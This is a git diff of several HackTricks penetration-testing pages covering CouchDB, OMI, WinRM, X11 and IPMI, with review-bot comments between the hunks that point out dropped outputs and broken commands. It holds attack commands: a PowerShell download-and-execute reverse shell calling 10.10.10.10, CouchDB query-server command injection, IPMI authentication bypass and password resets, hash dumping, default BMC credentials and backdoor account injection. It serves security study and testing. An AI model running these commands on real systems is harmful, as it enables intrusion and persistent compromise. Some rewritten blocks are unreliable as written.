The successful modification of the `local.ini` file was confirmed through file comparison: ```bash -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","god","passwords","simpsons","vultest"] -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df' -{"ok":true} -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","df","passwords","simpsons"] - -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' -{"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"} +curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` -``` -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","god","passwords","simpsons","vultest"] -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df' -{"ok":true} -www-data@canape:/dev/shm$ curl 'http://0xdf:df@localhost:5984/_all_dbs' -["_global_changes","_metadata","_replicator","_users","df","passwords","simpsons"] - -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' -{"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"} -``` - -Request it in a view: +The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view mapping to the newly added query server: ```bash -www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' -H "Content-Type: application/json" +curl -X PUT 'http://0xdf:df@localhost:5984/df' +curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' +curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d 
'{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' ``` -#### [Summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0) with a different payload +A **[summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** with an alternative payload provides further insights into exploiting CVE-2017-12636 under specific conditions. **Useful resources** for exploiting this vulnerability include: + +- [POC exploit code](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) +- [Exploit Database entry](https://www.exploit-db.com/exploits/44913/) ## Shodan diff --git a/network-services-pentesting/5985-5986-pentesting-omi.md b/network-services-pentesting/5985-5986-pentesting-omi.md index e0ace0254..eae04e1f5 100644 --- a/network-services-pentesting/5985-5986-pentesting-omi.md +++ b/network-services-pentesting/5985-5986-pentesting-omi.md 
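Review bot: the CVE-2018-8007 / CVE-2017-12636 hunk strips the command output that the surrounding prose still relies on, so several statements are now unsupported by the blocks beneath them: the `ls -l` block keeps only the command, but the removed `-rw-rw-rw- ... local.ini` line was what showed the file is writable ("verified by listing the permissions"); the `ps aux | grep couch` block loses the `runsv couchdb` line with pid 711 that the following `kill 711` depends on, and the beam line that shows `-setcookie monster`; the `curl http://localhost:5984` block loses the `"version":"2.0.0"` response although the text says the version is verified; the `query_servers/cmd` PUT loses the `badmatch ... {error,eacces}` response although the text says the permission problem is "indicated by the following output"; and the "confirmed through file comparison" block now repeats the curl PUT instead of the `diff local.ini local.ini.bk` output that showed `cmd = /sbin/ifconfig > /tmp/df`. Dropping the shell prompts is fine, but keep the response lines. Two further points: the final design-document `curl` drops the `-H "Content-Type: application/json"` header the removed command had, and its `-d` argument now sits on the next line without a `\` continuation, so the command as written will not run; and "A recently disclosed vulnerability, CVE-2018-8007" will age badly, the advisory URL dates it to August 2018, so say that instead. The closing sentence "The provided code examples and procedural steps offer a clear guide for replicating the exploit in a controlled environment" is filler and can go.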
@@ -7,35 +7,31 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. -## Basic Information +### **Basic Information** -OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft. OMI agents are commonly found installed on Azure Linux servers when the following services are in use: +**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. 
It's particularly relevant for Linux servers on Azure that utilize services such as: -* Azure Automation -* Azure Automatic Update -* Azure Operations Management Suite -* Azure Log Analytics -* Azure Configuration Management -* Azure Diagnostics +- **Azure Automation** +- **Azure Automatic Update** +- **Azure Operations Management Suite** +- **Azure Log Analytics** +- **Azure Configuration Management** +- **Azure Diagnostics** -When these services are configured, the omiengine process will listen on all interfaces and being running as the root user. +The process `omiengine` is initiated and listens on all interfaces as root when these services are activated. -
+**Default ports** used are **5985** (http) and **5986** (https). -**Default port:** 5985(http), 5986(https) +### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)** -## [CVE-2021-38647](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647) +As observed on September 16, Linux servers deployed in Azure with the mentioned services are susceptible due to a vulnerable version of OMI. This vulnerability lies in the OMI server's handling of messages through the `/wsman` endpoint without requiring an Authentication header, incorrectly authorizing the client. -As of September 16, newly created Linux servers in Azure are still packaged with a vulnerable version of the OMI agent. After deploying a Linux server and enabling one the services listed above, the server will be in a vulnerable state. - -The OMI server receives configuration management messages via the /wsman endpoint. Typically, an Authentication header is passed along with the message and the OMI server will ensure the client is authorized communicate. In this case the vulnerability is that when there is no Authentication header the server incorrectly accepts the message and executes the instruction under the root user. - -By posting an “ExecuteShellCommand” SOAP payload to the server with no Authentication header specified, it will execute the command as root. +An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authentication header, compelling the server to execute commands with root privileges. ```xml ``` -Find full exploit in [https://github.com/horizon3ai/CVE-2021-38647](https://github.com/horizon3ai/CVE-2021-38647) +For a more information about this CVE **[check this](https://github.com/horizon3ai/CVE-2021-38647)**. ## References 
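Review bot: heading level regression in the OMI hunk: `## Basic Information` and `## [CVE-2021-38647]` become `###` headings (with redundant bold inside them), which demotes the page's top-level sections to subsections; keep `##`. Wording: "As observed on September 16, Linux servers deployed in Azure ... are susceptible" drops the meaning of the removed sentence, which was that newly created servers were still being shipped with the vulnerable agent as of that date; keep that wording and add the year (2021, per the CVE id). And "For a more information about this CVE" should be "For more information about this CVE".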
@@ -63,7 +59,7 @@ Find full exploit in [https://github.com/horizon3ai/CVE-2021-38647](https://gith * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 309c37b36..d3dc61f71 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md 
@@ -31,49 +31,58 @@ Stay informed with the newest bug bounties launching and crucial platform update ## WinRM -[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) (WinRM) is a Microsoft protocol that **allows remote management of Windows machines** over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI. +[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) is highlighted as a **protocol by Microsoft** that enables the **remote management of Windows systems** through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations. -If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!) - -The easiest way to detect whether WinRM is available is by seeing if the port is opened. WinRM will listen on one of two ports: +The presence of WinRM on a machine allows for straightforward remote administration via PowerShell, akin to how SSH works for other operating systems. To determine if WinRM is operational, checking for the opening of specific ports is recommended: * **5985/tcp (HTTP)** * **5986/tcp (HTTPS)** -If one of these ports is open, WinRM is configured and you can try entering a remote session. +An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session. -## **Initiating WinRM Session**. +### **Initiating a WinRM Session** -We can configure PowerShell to work with WinRM. According to Microsoft documentation, Enable-PSRemoting is a cmdlet that configures the computer to receive PowerShell remote commands. 
If we have access to an elevated PowerShell prompt on the victim, we cam enable it and add any "attackers" as trusted hosts. We can run the following two commands: +To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted: -``` +```powershell Enable-PSRemoting -Force -Set-Item wsman:\localhost\client\trustedhosts * +Set-Item wsman:\localhost\client\trustedhosts * ``` -This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._ +This approach involves adding a wildcard to the `trustedhosts` configuration, a step that requires cautious consideration due to its implications. It's also noted that altering the network type from "Public" to "Work" might be necessary on the attacker's machine. -You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_: +Moreover, WinRM can be **activated remotely** using the `wmic` command, demonstrated as follows: -``` +```powershell wmic /node: process call create "powershell enable-psremoting -force" ``` +This method allows for the remote setup of WinRM, enhancing the flexibility in managing Windows machines from afar. + + ### Test if configured -Once the attack machine is configured, use the `Test-WSMan` function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid: +To verify the setup of your attack machine, the `Test-WSMan` command is utilized to check if the target has WinRM configured properly. By executing this command, you should expect to receive details concerning the protocol version and wsmid, indicating successful configuration. 
Below are examples demonstrating the expected output for a configured target versus an unconfigured one: + +- For a target that **is** properly configured, the output will look similar to this: + +```bash +Test-WSMan +``` + +The response should contain information about the protocol version and wsmid, signifying that WinRM is set up correctly. ![](<../.gitbook/assets/image (161) (1).png>) -![](<../.gitbook/assets/image (162).png>) +- Conversely, for a target **not** configured for WinRM, the would result in no such detailed information, highlighting the absence of a proper WinRM setup. -In this case the first one is configured and the second isn't. +![](<../.gitbook/assets/image (162).png>) ### Execute a command -Now we can use PowerShell's `Invoke-Command` to remotely execute a command on the target over WinRM. To remotely run `ipconfig` and see the output: +To execute `ipconfig` remotely on a target machine and view its output do: -``` +```powershell Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username] ``` 
@@ -81,25 +90,25 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do: -```ruby +```powershell Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] ``` ### Execute a Script -```ruby +```powershell Invoke-Command -ComputerName -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta] ``` ### Get reverse-shell -```ruby +```powershell Invoke-Command -ComputerName -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"} ``` ### Get a PS session -Or, if you want to drop right into an interactive PowerShell session, use the `Enter-PSSession` function: +To get an interactive PowerShell shell use `Enter-PSSession`: ```powershell #If you need to use different creds 
@@ -124,19 +133,17 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New ### **Forcing WinRM Open** -If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec: +To use PS Remoting and WinRM but the computer isn't configured, you could enable it with: +```powershell +.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" ``` -PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" -``` - -Now we can enter a remote PS session on the victim. ### Saving and Restoring sessions This **won't work** if the the **language** is **constrained** in the remote computer. -```ruby +```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force ## Note the ".\" in the suername to indicate it's a local user (host domain) @@ -150,7 +157,7 @@ Enter-PSSession -Session $sess1 Inside this sessions you can load PS scripts using _Invoke-Command_ -```ruby +```powershell Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 ``` diff --git a/network-services-pentesting/6000-pentesting-x11.md b/network-services-pentesting/6000-pentesting-x11.md index 07f87e230..b21885786 100644 --- a/network-services-pentesting/6000-pentesting-x11.md +++ b/network-services-pentesting/6000-pentesting-x11.md 
@@ -31,8 +31,7 @@ Stay informed with the newest bug bounties launching and crucial platform update ## Basic Information -The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.\ -From: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) +**X Window System** (X) is a versatile windowing system prevalent on UNIX-based operating systems. It provides a framework for creating graphical **user interfaces (GUIs)**, with individual programs handling the user interface design. This flexibility allows for diverse and customizable experiences within the X environment. **Default port:** 6000 
@@ -164,27 +163,25 @@ Other way: **Reverse Shell:** Xrdp also allows to take reverse shell via Netcat. Type in the following command: -**./xrdp.py \ –no-disp** +```bash +./xrdp.py \ –no-disp +``` -![](../.gitbook/assets/112217\_0051\_ExploitingX15.jpeg) +In the interface you can see the **R-shell option**. -It will prompt a new control pane where we can see the R-shell option, which is illustrated below: +Then, start a **Netcat listener** in your local system on port 5555. -![](../.gitbook/assets/112217\_0051\_ExploitingX16.jpeg) +```bash +nc -lvp 5555 +``` -We will start the Netcat listening mode in our local system on port 5555, which is illustrated below: +Then, put your IP address and port in the **R-Shell** option and click on **R-shell** to get a shell -![](../.gitbook/assets/112217\_0051\_ExploitingX17.jpeg) -Then add the IP and port and then select R-Shell, which is illustrated below: - -![](../.gitbook/assets/112217\_0051\_ExploitingX18.jpeg) - -Now as can be seen below we have complete system access: - -![](../.gitbook/assets/112217\_0051\_ExploitingX19.jpeg) - -{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %} +## References +* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) +* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) +* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref) ## Shodan diff --git a/network-services-pentesting/623-udp-ipmi.md b/network-services-pentesting/623-udp-ipmi.md index f92e8371c..39f81ec31 100644 --- a/network-services-pentesting/623-udp-ipmi.md +++ b/network-services-pentesting/623-udp-ipmi.md 
@@ -18,23 +18,23 @@ Other ways to support HackTricks: ## Basic Information -[Intelligent Platform Management Interface](https://www.thomas-krenn.com/en/wiki/IPMI\_Basics) (`IPMI`) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state. It operates using a direct network connection to the system's hardware and does not require access to the operating system via a login shell. IPMI can also be used for remote upgrades to systems without requiring physical access to the target host. IPMI is typically used in three ways: +### **Overview of IPMI** -* Before the OS has booted to modify BIOS settings -* When the host is fully powered down -* Access to a host after a system failure +**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for: -When not being used for these tasks, IPMI can monitor a range of different things such as system temperature, voltage, fan status, and power supplies. It can also be used for querying inventory information, reviewing hardware logs, and alerting using SNMP. The host system can be powered off, but the IPMI module requires a power source and a LAN connection to work correctly. 
+- Pre-OS boot configurations +- Power-off management +- Recovery from system failures -The IPMI protocol was first published by Intel in 1998 and is now supported by over 200 system vendors, including Cisco, Dell, HP, Supermicro, Intel, and more. Systems using IPMI version 2.0 can be administered via serial over LAN, giving sysadmins the ability to view serial console output in band. To function, IPMI requires the following components: +IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection. -* Baseboard Management Controller (BMC) - A micro-controller and essential component of an IPMI -* Intelligent Chassis Management Bus (ICMB) - An interface that permits communication from one chassis to another -* Intelligent Platform Management Bus (IPMB) - extends the BMC -* IPMI Memory - stores things such as the system event log, repository store data, and more -* Communications Interfaces - local system interfaces, serial and LAN interfaces, ICMB and PCI Management Bus +Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include: -![](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) +- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations. +- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections. +- **IPMI Memory:** For storing logs and data. 
+ +![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) **Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP) 
@@ -55,109 +55,76 @@ use auxiliary/scanner/ipmi/ipmi_version nmap -sU --script ipmi-version -p 623 10.10.10.10 ``` -### Vulnerability - IPMI Authentication Bypass via Cipher 0 +### IPMI Vulnerabilities -Dan Farmer [identified a serious failing](http://fish2.com/ipmi/cipherzero.html) of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually **allows access with any password**. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.\ -Note that to exploit this issue you first need to **find a valid user**. +In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through **cipher type 0**. This vulnerability, documented in detail at [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations. 
-You can **identify** this issue using: +### **IPMI Authentication Bypass via Cipher 0** -``` +To detect this flaw, the following Metasploit auxiliary scanner can be employed: + +```bash use auxiliary/scanner/ipmi/ipmi_cipher_zero ``` -And you can **abuse** this issue with `ipmitool`: +Exploitation of this flaw is achievable with `ipmitool`, as demonstrated below, allowing for the listing and modification of user passwords: ```bash -apt-get install ipmitool #Install -#Using -C 0 any password is accepted -ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users -ID Name Callin Link Auth IPMI Msg Channel Priv Limit -2 root true true true ADMINISTRATOR -3 Oper1 true true true ADMINISTRATOR -ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 #Change the password of root +apt-get install ipmitool # Installation command +ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users +ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password ``` -### Vulnerability - IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval +### **IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval** -Basically, **you can ask the server for the a salted hashed MD5 and SHA1 of any username and if the username exists those hashes will be sent back.** Yeah, as amazing as it sounds. And there is a **metasploit module** for testing this (you can select the output in John or Hashcat format): +This vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. 
To test this vulnerability, Metasploit offers a module: ```bash msf > use auxiliary/scanner/ipmi/ipmi_dumphashes ``` -_Note that for this you only need a list of usernames to brute-force (metasploit already contains one with default usernames)._ +### **IPMI Anonymous Authentication** -Using `ipmitool`bypassing authentication (`-c 0`) to change the root password to abc123: - -``` -root@kali:~# apt-get install ipmitool -root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list -ID Name Callin Link Auth IPMI Msg Channel Priv Limit -2 root true true true ADMINISTRATOR -3 Oper1 true true true ADMINISTRATOR -root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 -``` - -### Vulnerability - IPMI Anonymous Authentication - -In addition to the authentication problems above, Dan Farmer noted that **many BMCs ship with "anonymous" access enabled by default**. This is configured by setting the username of the first **user** account to a **null string** and **setting** a **null password** to match. The _ipmi\_dumphashes_ module will identify and dump the password hashes (including blank passwords) for null user accounts. **This account can be difficult to use on its own, but we can leverage `ipmitool` to reset the password of a named user account** and leverage that account for access to other services: +A default configuration in many BMCs allows "anonymous" access, characterized by null username and password strings. 
This configuration can be exploited to reset passwords of named user accounts using `ipmitool`: ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list - -ID Name Callin Link Auth IPMI Msg Channel Priv Limit -1 false false true ADMINISTRATOR -2 root false false true ADMINISTRATOR -3 admin true true true ADMINISTRATOR - -ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword #Change the password of the user 2 (root) to "newpassword" +ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword ``` -### Vulnerability - Supermicro IPMI Clear-text Passwords +### **Supermicro IPMI Clear-text Passwords** -The IPMI 2.0 specification mandates that the BMC respond to HMAC-based authentication methods such as SHA1 and MD5. This authentication process has some serious weaknesses, as demonstrated in previous examples, but also **requires access to the clear-text password in order to calculate the authentication hash**. This means that the BMC must store a **clear-text version** of all configured user passwords somewhere in **non-volatile storage**. In the case of **Supermicro**, this location changes between firmware versions, but is either **`/nv/PSBlock`** or **`/nv/PSStore`**. The passwords are scattered between various binary blobs, but easy to pick out as they always follow the username. This is a serious issue for any organization that uses shared passwords between BMCs or even different types of devices. +A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as `/nv/PSBlock` or `/nv/PSStore` raises significant security concerns: ```bash - cat /nv/PSBlock - admin ADMINpassword^TT rootOtherPassword! 
+cat /nv/PSBlock ``` -### Vulnerability - Supermicro IPMI UPnP +### **Supermicro IPMI UPnP Vulnerability** -Supermicro includes a **UPnP SSDP listener running on UDP port 1900** on the IPMI firmware of many of its recent motherboards. On versions prior to SMT\_X9\_218 this service was running the Intel SDK for UPnP Devices, version 1.3.1. This version is vulnerable to [the issues Rapid7 disclosed](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) in February of 2013, and an exploit target for this platform is part of the Metasploit Framework. The interesting thing about this attack is that it **yields complete root access to the BMC**, something that is otherwise difficult to obtain. Keep in mind than an attacker with administrative access, either over the network or from a root shell on the host system, can downgrade the firmware of a Supermicro BMC to a vulnerable version and then exploit it. Once **root** access is **obtained**, it is possible to **read cleartext credentials** from the file system, **install** additional **software**, and integrate permanent **backdoors** into the BMC that would survive a full reinstall of the host's operating system. +Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by [Rapid7's disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), allow for root access to the BMC: ```bash msf> use exploit/multi/upnp/libupnp_ssdp_overflow ``` + ### Brute Force -Note that only HP randomizes the password during the manufacturing process. +**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. 
A summary of default usernames and passwords for various products is provided as follows: -| Product Name | Default Username | Default Password | -| --------------------------------------------------- | ---------------- | ---------------------------------------- | -| **HP Integrated Lights Out (iLO)** | Administrator | \ | -| **Dell Remote Access Card (iDRAC, DRAC)** | root | calvin | -| **IBM Integrated Management Module (IMM)** | USERID | PASSW0RD (with a zero) | -| **Fujitsu Integrated Remote Management Controller** | admin | admin | -| **Supermicro IPMI (2.0)** | ADMIN | ADMIN | -| **Oracle/Sun Integrated Lights Out Manager (ILOM)** | root | changeme | -| **ASUS iKVM BMC** | admin | admin | +- **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level. +- Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively. +- Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords. -## Exploiting the Host from the BMC -Once administrative access to the BMC is obtained, there are a number of methods available that can be used to gain access to the host operating system. The most direct path is to abuse the BMCs KVM functionality and reboot the host to a root shell (init=/bin/sh in GRUB) or specify a rescue disk as a virtual CD-ROM and boot to that. Once raw access to the host's disk is obtained, it is trivial to introduce a backdoor, copy data from the hard drive, or generally do anything needing doing as part of the security assessment. The big downside, of course, is that the host has to be rebooted to use this method. Gaining access to the host running is much trickier and depends on what the host is running. 
If the physical console of the host is left logged in, it becomes trivial to hijack this using the built-in KVM functionality. The same applies to serial consoles - if the serial port is connected to an authenticated session, the BMC may allow this port to be hijacked using the ipmitool interface for serial-over-LAN (sol). One path that still needs more research is abusing access to shared hardware, such as the i2c bus and the Super I/O chip. +## Accessing the Host via BMC -![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_bios.png) +Administrative access to the Baseboard Management Controller (BMC) opens various pathways for accessing the host's operating system. A straightforward approach involves exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality. This can be done by either rebooting the host to a root shell via GRUB (using `init=/bin/sh`) or booting from a virtual CD-ROM set as a rescue disk. Such methods allow for direct manipulation of the host's disk, including the insertion of backdoors, data extraction, or any necessary actions for a security assessment. However, this requires rebooting the host, which is a significant drawback. Without rebooting, accessing the running host is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can easily be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via `ipmitool`. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, is an area that demands further investigation. 
-![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png) +## Introducing Backdoors into BMC from the Host -![](<../.gitbook/assets/image (202) (2).png>) - -## Exploiting the BMC from the Host - -In situations where a host with a BMC has been compromised, the **local interface to the BMC can be used to introduce a backdoor user account**, and from there establish a permanent foothold on the server. This attack requires the **`ipmitool`** to be installed on the host and driver support to be enabled for the BMC. The example below demonstrates how the local interface on the host, which does not require authentication, can be used to inject a new user account into the BMC. This method is universal across Linux, Windows, BSD, and even DOS targets. +Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS. ```bash ipmitool user list @@ -175,6 +142,7 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit 4 backdoor true false true ADMINISTRATOR ``` + ## Shodan * `port:623` @@ -182,7 +150,6 @@ ID Name Callin Link Auth IPMI Msg Channel Priv Limit ## References * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) -* [https://academy.hackthebox.com/module/112/section/1245](https://academy.hackthebox.com/module/112/section/1245)
